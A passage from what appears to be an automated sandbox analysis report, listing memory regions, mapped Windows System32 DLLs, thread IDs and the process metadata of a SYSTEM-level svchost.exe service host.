0x7ff7b3440000 end_va = 0x7ff7b3462fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3440000" filename = "" Region: id = 14999 start_va = 0x7ff7b3463000 end_va = 0x7ff7b3464fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3463000" filename = "" Region: id = 15000 start_va = 0x7ff7b3467000 end_va = 0x7ff7b3468fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3467000" filename = "" Region: id = 15001 start_va = 0x7ff7b3469000 end_va = 0x7ff7b346afff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3469000" filename = "" Region: id = 15002 start_va = 0x7ff7b346b000 end_va = 0x7ff7b346cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b346b000" filename = "" Region: id = 15003 start_va = 0x7ff7b346d000 end_va = 0x7ff7b346dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b346d000" filename = "" Region: id = 15004 start_va = 0x7ff7b346e000 end_va = 0x7ff7b346ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b346e000" filename = "" Region: id = 15005 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 15006 start_va = 0x7ffbea370000 end_va = 0x7ffbea4f9fff entry_point = 0x7ffbea370000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 15007 start_va = 0x7ffbeba60000 end_va = 0x7ffbebaa2fff entry_point = 0x7ffbeba60000 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 15008 start_va = 0x7ffbf0930000 end_va = 0x7ffbf09b4fff entry_point = 0x7ffbf0930000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 15009 start_va = 0x7ffbf6150000 end_va = 0x7ffbf6163fff entry_point = 0x7ffbf6150000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 15010 start_va = 0x7ffbf6170000 end_va = 0x7ffbf6267fff entry_point = 0x7ffbf6170000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 15011 start_va = 0x7ffbf64d0000 end_va = 0x7ffbf64e0fff entry_point = 0x7ffbf64d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 15012 start_va = 0x7ffbf6a40000 end_va = 0x7ffbf6a6ffff entry_point = 0x7ffbf6a40000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 15013 start_va = 0x7ffbfa160000 end_va = 0x7ffbfa1defff entry_point = 0x7ffbfa160000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 15014 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 15015 start_va = 0x7ffbfcbc0000 end_va = 0x7ffbfccf0fff entry_point = 0x7ffbfcbc0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 15016 start_va = 0x7ffbfcf40000 end_va = 0x7ffbfcf4dfff entry_point = 0x7ffbfcf40000 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 15017 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 15018 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 15019 start_va = 0x7ffbfcfe0000 end_va = 0x7ffbfd015fff entry_point = 0x7ffbfcfe0000 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 15020 start_va = 0x7ffbfd020000 end_va = 0x7ffbfd0b7fff entry_point = 0x7ffbfd020000 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 15021 start_va = 0x7ffbfd0c0000 end_va = 0x7ffbfd107fff entry_point = 0x7ffbfd0c0000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 15022 start_va = 0x7ffbfd110000 end_va = 0x7ffbfd16cfff entry_point = 0x7ffbfd110000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 15023 start_va = 0x7ffbfd190000 end_va = 0x7ffbfd19afff entry_point = 0x7ffbfd190000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 15024 start_va = 0x7ffbfd1a0000 end_va = 0x7ffbfd1a7fff entry_point = 0x7ffbfd1a0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 15025 start_va = 0x7ffbfd1b0000 end_va = 0x7ffbfd2c0fff entry_point = 0x7ffbfd1b0000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 15026 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 15027 start_va = 0x7ffbfd740000 end_va = 0x7ffbfd7b1fff entry_point = 0x7ffbfd740000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 15028 start_va = 0x7ffbfd810000 end_va = 0x7ffbfd820fff entry_point = 0x7ffbfd810000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 15029 start_va = 0x7ffbfdc20000 end_va = 0x7ffbfdc37fff entry_point = 0x7ffbfdc20000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 15030 start_va = 0x7ffbfdf20000 end_va = 0x7ffbfe0cafff entry_point = 0x7ffbfdf20000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 15031 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 15032 start_va = 0x7ffbfe0e0000 end_va = 0x7ffbfe0e8fff entry_point = 0x7ffbfe0e0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 15033 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 15034 start_va = 0x7ffbfe130000 end_va = 0x7ffbfe139fff entry_point = 0x7ffbfe130000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 15035 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 15036 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 15037 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 15038 start_va = 0x7ffbff610000 end_va = 0x7ffbff691fff entry_point = 0x7ffbff610000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 15039 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 15040 start_va = 0x7ffbff8f0000 end_va = 0x7ffbff8fbfff entry_point = 0x7ffbff8f0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 15041 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 15042 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 15043 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 15044 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 15045 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 15046 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 15047 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 15048 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15049 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 15050 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15051 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15052 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 15053 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 15054 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15055 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 15056 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 15057 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 15058 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 15059 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15060 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 15061 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15062 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15063 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15064 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15065 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 15066 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15067 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15068 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15069 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 15070 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 15071 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15072 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15073 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1208 os_tid = 0xdd4 Thread: id = 1209 os_tid = 0xd10 Thread: id = 1210 os_tid = 0xde8 Thread: id = 1211 os_tid = 0xd48 Thread: id = 1212 os_tid = 0x6b8 Thread: id = 1213 os_tid = 0x5c8 Thread: id = 1214 os_tid = 0x634 Thread: id = 1215 os_tid = 0x408 Thread: id = 1216 os_tid = 0x298 Thread: id = 1217 os_tid = 0x8b4 Thread: id = 1218 os_tid = 0x398 Thread: id = 1219 os_tid = 0x2cc Thread: id = 1220 os_tid = 0x2c0 Thread: id = 1221 os_tid = 0x258 Thread: id = 1222 os_tid = 0x234 Thread: id = 1223 os_tid = 0x1e0 Thread: id = 1224 os_tid = 0xf4 Thread: id = 1225 os_tid = 0x3ac Thread: id = 1226 os_tid = 0x3a8 Thread: id = 1227 os_tid = 0x3a4 Thread: id = 1228 os_tid = 0x3a0 Thread: id = 1229 os_tid = 0x380 Thread: id = 1230 os_tid = 0x374 Thread: id = 1231 os_tid = 0x328 Process: id = "284" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x28fd6000" os_pid = "0x348" os_integrity_level = "0x4000" os_privileges = "0x60b16080" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xa], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\DeviceAssociationService" [0xa], "NT SERVICE\\DevQueryBroker" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\DsSvc" [0xa], "NT SERVICE\\fhsvc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\NcbService" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\ScDeviceEnum" [0xa], "NT SERVICE\\SensorService" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\svsvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\vmicguestinterface" [0xa], "NT SERVICE\\vmickvpexchange" [0xa], "NT SERVICE\\vmicshutdown" [0xa], "NT SERVICE\\vmicvmsession" [0xa], "NT SERVICE\\vmicvss" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\WiaRpc" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xe], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000de6d" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 14182 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14183 start_va = 0x5b76d00000 end_va = 0x5b76d0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76d00000" filename = "" Region: id = 14184 start_va = 0x5b76d10000 end_va = 0x5b76d10fff entry_point = 0x5b76d10000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 14185 start_va = 0x5b76d20000 end_va = 0x5b76d33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76d20000" filename = "" Region: id = 14186 start_va = 0x5b76d40000 end_va = 0x5b76dbffff entry_point = 0x0 region_type = private name = "private_0x0000005b76d40000" filename = "" Region: id = 14187 start_va = 0x5b76dc0000 end_va = 0x5b76dc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76dc0000" filename = "" Region: id = 14188 start_va = 0x5b76dd0000 end_va = 0x5b76dd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76dd0000" filename = "" Region: id = 14189 start_va = 0x5b76de0000 end_va = 0x5b76de1fff entry_point = 0x0 region_type = private name = "private_0x0000005b76de0000" filename = "" Region: id = 14190 start_va = 0x5b76df0000 end_va = 0x5b76eadfff entry_point = 0x5b76df0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14191 start_va = 0x5b76eb0000 end_va = 0x5b76ef7fff entry_point = 0x0 region_type = private name = "private_0x0000005b76eb0000" filename = "" Region: id = 14192 start_va = 0x5b76f30000 end_va = 0x5b76f30fff entry_point = 0x0 region_type = private name = "private_0x0000005b76f30000" filename = "" Region: id = 14193 start_va = 0x5b76f40000 end_va = 0x5b76f40fff entry_point = 0x0 region_type = private name = "private_0x0000005b76f40000" filename = "" Region: id = 14194 start_va = 0x5b76f50000 end_va = 0x5b76f50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76f50000" filename = "" Region: id = 14195 start_va = 0x5b76f60000 end_va = 0x5b76f60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76f60000" filename = "" Region: id = 14196 start_va = 0x5b76f70000 end_va = 0x5b76f70fff entry_point = 0x0 region_type = private name = "private_0x0000005b76f70000" filename = "" Region: id = 14197 start_va = 0x5b76f80000 end_va = 0x5b76f80fff entry_point = 0x0 region_type = private name = "private_0x0000005b76f80000" filename = "" Region: id = 14198 start_va = 0x5b76f90000 end_va = 0x5b76f90fff entry_point = 0x5b76f90000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 14199 start_va = 0x5b76fa0000 end_va = 0x5b76fa0fff entry_point = 0x5b76fa0000 region_type = mapped_file name = "audioendpointbuilder.dll.mui" filename = "\\Windows\\System32\\en-US\\AudioEndpointBuilder.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\audioendpointbuilder.dll.mui") Region: id = 14200 start_va = 0x5b76fb0000 end_va = 0x5b76fb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b76fb0000" filename = "" Region: id = 14201 start_va = 0x5b76fc0000 end_va = 0x5b76fc5fff entry_point = 0x5b76fc0000 region_type = mapped_file name = "sysmain.dll.mui" filename = "\\Windows\\System32\\en-US\\sysmain.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sysmain.dll.mui") Region: id = 14202 start_va = 0x5b76fe0000 end_va = 0x5b76fe6fff entry_point = 0x0 region_type = private name = "private_0x0000005b76fe0000" filename = "" Region: id = 14203 start_va = 0x5b77000000 end_va = 0x5b770fffff entry_point = 0x0 region_type = private name = "private_0x0000005b77000000" filename = "" Region: id = 14204 start_va = 0x5b77100000 end_va = 0x5b771bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b77100000" filename = "" Region: id = 14205 start_va = 0x5b771c0000 end_va = 0x5b771c6fff entry_point = 0x0 region_type = private name = "private_0x0000005b771c0000" filename = "" Region: id = 14206 start_va = 0x5b77200000 end_va = 0x5b772fffff entry_point = 0x0 region_type = private name = "private_0x0000005b77200000" filename = "" Region: id = 14207 start_va = 0x5b77300000 end_va = 0x5b77487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b77300000" filename = "" Region: id = 14208 start_va = 0x5b77490000 end_va = 0x5b77610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005b77490000" filename = "" Region: id = 14209 start_va = 0x5b77620000 end_va = 0x5b7771ffff entry_point = 0x0 region_type = private name = "private_0x0000005b77620000" filename = "" Region: id = 14210 start_va = 0x5b77720000 end_va = 0x5b7781ffff entry_point = 0x0 region_type = private name = "private_0x0000005b77720000" filename = "" Region: id = 14211 start_va = 0x5b77820000 end_va = 0x5b7791ffff entry_point = 0x0 region_type = private name = "private_0x0000005b77820000" filename = "" Region: id = 14212 start_va = 0x5b77920000 end_va = 0x5b77a1ffff entry_point = 0x0 region_type = private name = "private_0x0000005b77920000" filename = "" Region: id = 14213 start_va = 0x5b77aa0000 end_va = 0x5b77b1ffff entry_point = 0x0 region_type = private name = "private_0x0000005b77aa0000" filename = "" Region: id = 14214 start_va = 0x5b77b20000 end_va = 0x5b77e56fff entry_point = 0x5b77b20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14215 start_va = 0x5b77e60000 end_va = 0x5b77edffff entry_point = 0x0 region_type = private name = "private_0x0000005b77e60000" filename = "" Region: id = 14216 start_va = 0x5b77ee0000 end_va = 0x5b77fdffff entry_point = 0x0 region_type = private name = "private_0x0000005b77ee0000" filename = "" Region: id = 14217 start_va = 0x5b78060000 end_va = 0x5b78090fff entry_point = 0x5b78060000 region_type = mapped_file name = "pfpre_871cf952.mkd" filename = "\\Windows\\Prefetch\\PfPre_871cf952.mkd" (normalized: "c:\\windows\\prefetch\\pfpre_871cf952.mkd") Region: id = 14218 start_va = 0x5b780a0000 end_va = 0x5b780a6fff entry_point = 0x0 region_type = private name = "private_0x0000005b780a0000" filename = "" Region: id = 14219 start_va = 0x5b78120000 end_va = 0x5b78126fff entry_point = 0x0 region_type = private name = "private_0x0000005b78120000" filename = "" Region: id = 14220 start_va = 0x5b78160000 end_va = 0x5b7825ffff entry_point = 0x0 region_type = private name = "private_0x0000005b78160000" filename = "" Region: id = 14221 start_va = 0x5b78260000 end_va = 0x5b7835ffff entry_point = 0x0 region_type = private name = "private_0x0000005b78260000" filename = "" Region: id = 14222 start_va = 0x5b78360000 end_va = 0x5b7845ffff entry_point = 0x0 region_type = private name = "private_0x0000005b78360000" filename = "" Region: id = 14223 start_va = 0x5b78500000 end_va = 0x5b785fffff entry_point = 0x0 region_type = private name = "private_0x0000005b78500000" filename = "" Region: id = 14224 start_va = 0x5b78600000 end_va = 0x5b786fffff entry_point = 0x0 region_type = private name = "private_0x0000005b78600000" filename = "" Region: id = 14225 start_va = 0x5b78700000 end_va = 0x5b787fffff entry_point = 0x0 region_type = private name = "private_0x0000005b78700000" filename = "" Region: id = 14226 start_va = 0x5b78800000 end_va = 0x5c787fffff entry_point = 0x0 region_type = private name = "private_0x0000005b78800000" filename = "" Region: id = 14227 start_va = 0x5c78800000 end_va = 0x5c788fffff 